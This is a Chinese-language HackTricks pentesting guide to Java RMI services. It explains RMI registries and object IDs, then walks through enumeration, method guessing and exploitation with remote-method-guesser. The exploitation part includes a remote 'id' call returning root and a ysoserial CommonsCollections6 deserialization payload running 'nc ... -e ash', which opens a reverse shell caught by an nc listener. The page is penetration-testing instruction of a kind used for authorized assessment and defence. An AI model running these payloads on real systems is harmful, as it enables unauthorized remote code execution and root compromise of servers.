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1098/1099/1050 - Java RMI渗透测试 - RMI-IIOP

通过 htARTE (HackTricks AWS Red Team Expert)从零开始学习AWS黑客攻击


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Java远程方法调用Java RMI是一种面向对象的_RPC_机制允许位于一个_Java虚拟机_中的对象调用位于另一个_Java虚拟机_中的对象的方法。这使得开发者能够使用面向对象的范式编写分布式应用程序。可以在这个blackhat演讲中找到关于_Java RMI_的简短介绍从攻击者的角度来看。

默认端口: 1090,1098,1099,1199,4443-4446,8999-9010,9999

1090/tcp  open  ssl/java-rmi Java RMI
9010/tcp  open  java-rmi     Java RMI
37471/tcp open  java-rmi     Java RMI
40259/tcp open  ssl/java-rmi Java RMI

通常,只有默认的 Java RMI 组件(RMI 注册表激活系统)绑定到常见端口。实际实现 RMI 应用的 远程对象 通常绑定到随机端口,如上面的输出所示。

nmap 有时候难以识别受 SSL 保护的 RMI 服务。如果你在一个常见的 RMI 端口上遇到未知的 ssl 服务,你应该进一步调查。

RMI 组件

简单来说,Java RMI 允许开发者在网络上提供一个 Java 对象。这会打开一个 TCP 端口,客户端可以连接并在相应对象上调用方法。尽管这听起来很简单,但 Java RMI 需要解决几个挑战:

  1. 为了通过 Java RMI 发送方法调用,客户端需要知道目标对象的 IP 地址、监听端口、实现的类或接口以及 ObjIDObjID 是在对象在网络上可用时创建的唯一且随机的标识符。它是必需的,因为 Java RMI 允许多个对象在同一个 TCP 端口上监听)。
  2. 远程客户端可能会通过调用暴露对象上的方法在服务器上分配资源。Java 虚拟机 需要跟踪哪些资源仍在使用中,哪些可以被垃圾回收。

第一个挑战由 RMI 注册表 解决,它基本上是 Java RMI 的命名服务。RMI 注册表 本身也是一个 RMI 服务,但实现的接口和 ObjID 是固定的并且所有 RMI 客户端都知道。这允许 RMI 客户端仅通过知道相应的 TCP 端口就可以使用 RMI 注册表

当开发者想要在网络中提供他们的 Java 对象 时,他们通常会将它们绑定到一个 RMI 注册表注册表 存储连接到对象所需的所有信息IP 地址、监听端口、实现的类或接口以及 ObjID 值),并在一个人类可读的名称(绑定名称)下提供它。想要使用 RMI 服务 的客户端会向 RMI 注册表 请求相应的 绑定名称,注册表返回连接所需的所有信息。因此,情况基本上与普通的 DNS 服务相同。以下列表显示了一个小例子:

import java.rmi.registry.Registry;
import java.rmi.registry.LocateRegistry;
import lab.example.rmi.interfaces.RemoteService;

public class ExampleClient {

private static final String remoteHost = "";
private static final String boundName = "remote-service";

public static void main(String[] args)
try {
Registry registry = LocateRegistry.getRegistry(remoteHost);     // Connect to the RMI registry
RemoteService ref = (RemoteService)registry.lookup(boundName);  // Lookup the desired bound name
String response = ref.remoteMethod();                           // Call a remote method

} catch( Exception e) {

RMI 枚举

remote-method-guesser 是一个 Java RMI 漏洞扫描器,能够自动识别常见的 RMI 漏洞。每当你发现一个 RMI 端点时,你应该尝试一下:

$ rmg enum 9010
[+] RMI registry bound names:
[+] 	- plain-server2
[+] 		--> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+] 		    Endpoint: iinsecure.dev:37471  TLS: no  ObjID: [55ff5a5d:17e0501b054:-7ff7, 3638117546492248534]
[+] 	- legacy-service
[+] 		--> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class)
[+] 		    Endpoint: iinsecure.dev:37471  TLS: no  ObjID: [55ff5a5d:17e0501b054:-7ffc, 708796783031663206]
[+] 	- plain-server
[+] 		--> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+] 		    Endpoint: iinsecure.dev:37471  TLS: no  ObjID: [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
[+] RMI server codebase enumeration:
[+] 	- http://iinsecure.dev/well-hidden-development-folder/
[+] 		--> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub
[+] 		--> de.qtc.rmg.server.interfaces.IPlainServer
[+] RMI server String unmarshalling enumeration:
[+] 	- Caught ClassNotFoundException during lookup call.
[+] 	  --> The type java.lang.String is unmarshalled via readObject().
[+] 	  Configuration Status: Outdated
[+] RMI server useCodebaseOnly enumeration:
[+] 	- Caught MalformedURLException during lookup call.
[+] 	  --> The server attempted to parse the provided codebase (useCodebaseOnly=false).
[+] 	  Configuration Status: Non Default
[+] RMI registry localhost bypass enumeration (CVE-2019-2684):
[+] 	- Caught NotBoundException during unbind call (unbind was accepeted).
[+] 	  Vulnerability Status: Vulnerable
[+] RMI Security Manager enumeration:
[+] 	- Security Manager rejected access to the class loader.
[+] 	  --> The server does use a Security Manager.
[+] 	  Configuration Status: Current Default
[+] RMI server JEP290 enumeration:
[+] 	- DGC rejected deserialization of java.util.HashMap (JEP290 is installed).
[+] 	  Vulnerability Status: Non Vulnerable
[+] RMI registry JEP290 bypass enmeration:
[+] 	- Caught IllegalArgumentException after sending An Trinh gadget.
[+] 	  Vulnerability Status: Vulnerable
[+] RMI ActivationSystem enumeration:
[+] 	- Caught IllegalArgumentException during activate call (activator is present).
[+] 	  --> Deserialization allowed	 - Vulnerability Status: Vulnerable
[+] 	  --> Client codebase enabled	 - Configuration Status: Non Default


remote-method-guesser 显示的 ObjID 值可用于确定服务的运行时间。这可能有助于识别其他漏洞:

$ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
[+] Details for ObjID [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
[+] ObjNum: 		-4004948013687638236
[+] UID:
[+] 	Unique: 	1442798173
[+] 	Time: 		1640761503828 (Dec 29,2021 08:05)
[+] 	Count: 		-32760


即使在枚举过程中没有识别出漏洞,可用的 RMI 服务仍可能暴露危险功能。此外,尽管与 RMI 默认组件的通信受到反序列化过滤器的保护,但与自定义 RMI 服务的通信通常没有这些过滤器。因此,了解 RMI 服务上有效的方法签名是有价值的。

不幸的是,Java RMI 不支持在 远程对象 上枚举方法。话虽如此,使用像 remote-method-guesserrmiscout 这样的工具可以穷举方法签名:

$ rmg guess 9010
[+] Reading method candidates from internal wordlist rmg.txt
[+] 	752 methods were successfully parsed.
[+] Reading method candidates from internal wordlist rmiscout.txt
[+] 	2550 methods were successfully parsed.
[+] Starting Method Guessing on 3281 method signature(s).
[+] 	MethodGuesser is running:
[+] 		--------------------------------
[+] 		[ plain-server2  ] HIT! Method with signature String execute(String dummy) exists!
[+] 		[ plain-server2  ] HIT! Method with signature String system(String dummy, String[] dummy2) exists!
[+] 		[ legacy-service ] HIT! Method with signature void logMessage(int dummy1, String dummy2) exists!
[+] 		[ legacy-service ] HIT! Method with signature void releaseRecord(int recordID, String tableName, Integer remoteHashCode) exists!
[+] 		[ legacy-service ] HIT! Method with signature String login(java.util.HashMap dummy1) exists!
[+] 		[6562 / 6562] [#####################################] 100%
[+] 	done.
[+] Listing successfully guessed methods:
[+] 	- plain-server2 == plain-server
[+] 		--> String execute(String dummy)
[+] 		--> String system(String dummy, String[] dummy2)
[+] 	- legacy-service
[+] 		--> void logMessage(int dummy1, String dummy2)
[+] 		--> void releaseRecord(int recordID, String tableName, Integer remoteHashCode)
[+] 		--> String login(java.util.HashMap dummy1)


$ rmg call 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar
[+] uid=0(root) gid=0(root) groups=0(root)


$ rmg serial 9010 CommonsCollections6 'nc 4444 -e ash' --bound-name plain-server --signature "String execute(String dummy)"
[+] Creating ysoserial payload... done.
[+] Attempting deserialization attack on RMI endpoint...
[+] 	Using non primitive argument type java.lang.String on position 0
[+] 	Specified method signature is String execute(String dummy)
[+] 	Caught ClassNotFoundException during deserialization attack.
[+] 	Server attempted to deserialize canary class 6ac727def61a4800a09987c24352d7ea.
[+] 	Deserialization attack probably worked :)

$ nc -vlp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
uid=0(root) gid=0(root) groups=0(root)





$ rmg enum 1090 | head -n 5
[+] RMI registry bound names:
[+] 	- jmxrmi
[+] 		--> javax.management.remote.rmi.RMIServerImpl_Stub (known class: JMX Server)
[+] 		    Endpoint: localhost:41695  TLS: no  ObjID: [7e384a4f:17e0546f16f:-7ffe, -553451807350957585]

$ rmg known javax.management.remote.rmi.RMIServerImpl_Stub
[+] Name:
[+] 	JMX Server
[+] Class Name:
[+] 	- javax.management.remote.rmi.RMIServerImpl_Stub
[+] 	- javax.management.remote.rmi.RMIServer
[+] Description:
[+] 	Java Management Extensions (JMX) can be used to monitor and manage a running Java virtual machine.
[+] 	This remote object is the entrypoint for initiating a JMX connection. Clients call the newClient
[+] 	method usually passing a HashMap that contains connection options (e.g. credentials). The return
[+] 	value (RMIConnection object) is another remote object that is when used to perform JMX related
[+] 	actions. JMX uses the randomly assigned ObjID of the RMIConnection object as a session id.
[+] Remote Methods:
[+] 	- String getVersion()
[+] 	- javax.management.remote.rmi.RMIConnection newClient(Object params)
[+] References:
[+] 	- https://docs.oracle.com/javase/8/docs/technotes/guides/management/agent.html
[+] 	- https://github.com/openjdk/jdk/tree/master/src/java.management.rmi/share/classes/javax/management/remote/rmi
[+] Vulnerabilities:
[+] 	-----------------------------------
[+] 	Name:
[+] 		MLet
[+] 	Description:
[+] 		MLet is the name of an MBean that is usually available on JMX servers. It can be used to load
[+] 		other MBeans dynamically from user specified codebase locations (URLs). Access to the MLet MBean
[+] 		is therefore most of the time equivalent to remote code execution.
[+] 	References:
[+] 		- https://github.com/qtc-de/beanshooter
[+] 	-----------------------------------
[+] 	Name:
[+] 		Deserialization
[+] 	Description:
[+] 		Before CVE-2016-3427 got resolved, JMX accepted arbitrary objects during a call to the newClient
[+] 		method, resulting in insecure deserialization of untrusted objects. Despite being fixed, the
[+] 		actual JMX communication using the RMIConnection object is not filtered. Therefore, if you can
[+] 		establish a working JMX connection, you can also perform deserialization attacks.
[+] 	References:
[+] 		- https://github.com/qtc-de/beanshooter


  • port:1099 java


HackTricks 自动命令

Protocol_Name: Java RMI                                        #Protocol Abbreviation if there is one.
Port_Number:  1090,1098,1099,1199,4443-4446,8999-9010,9999     #Comma separated if there is more than one.
Protocol_Description: Java Remote Method Invocation            #Protocol Abbreviation Spelled out

Name: Enumeration
Description: Perform basic enumeration of an RMI service
Command: rmg enum {IP} {PORT}

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通过 htARTE (HackTricks AWS Red Team Expert)从零开始学习AWS黑客攻击
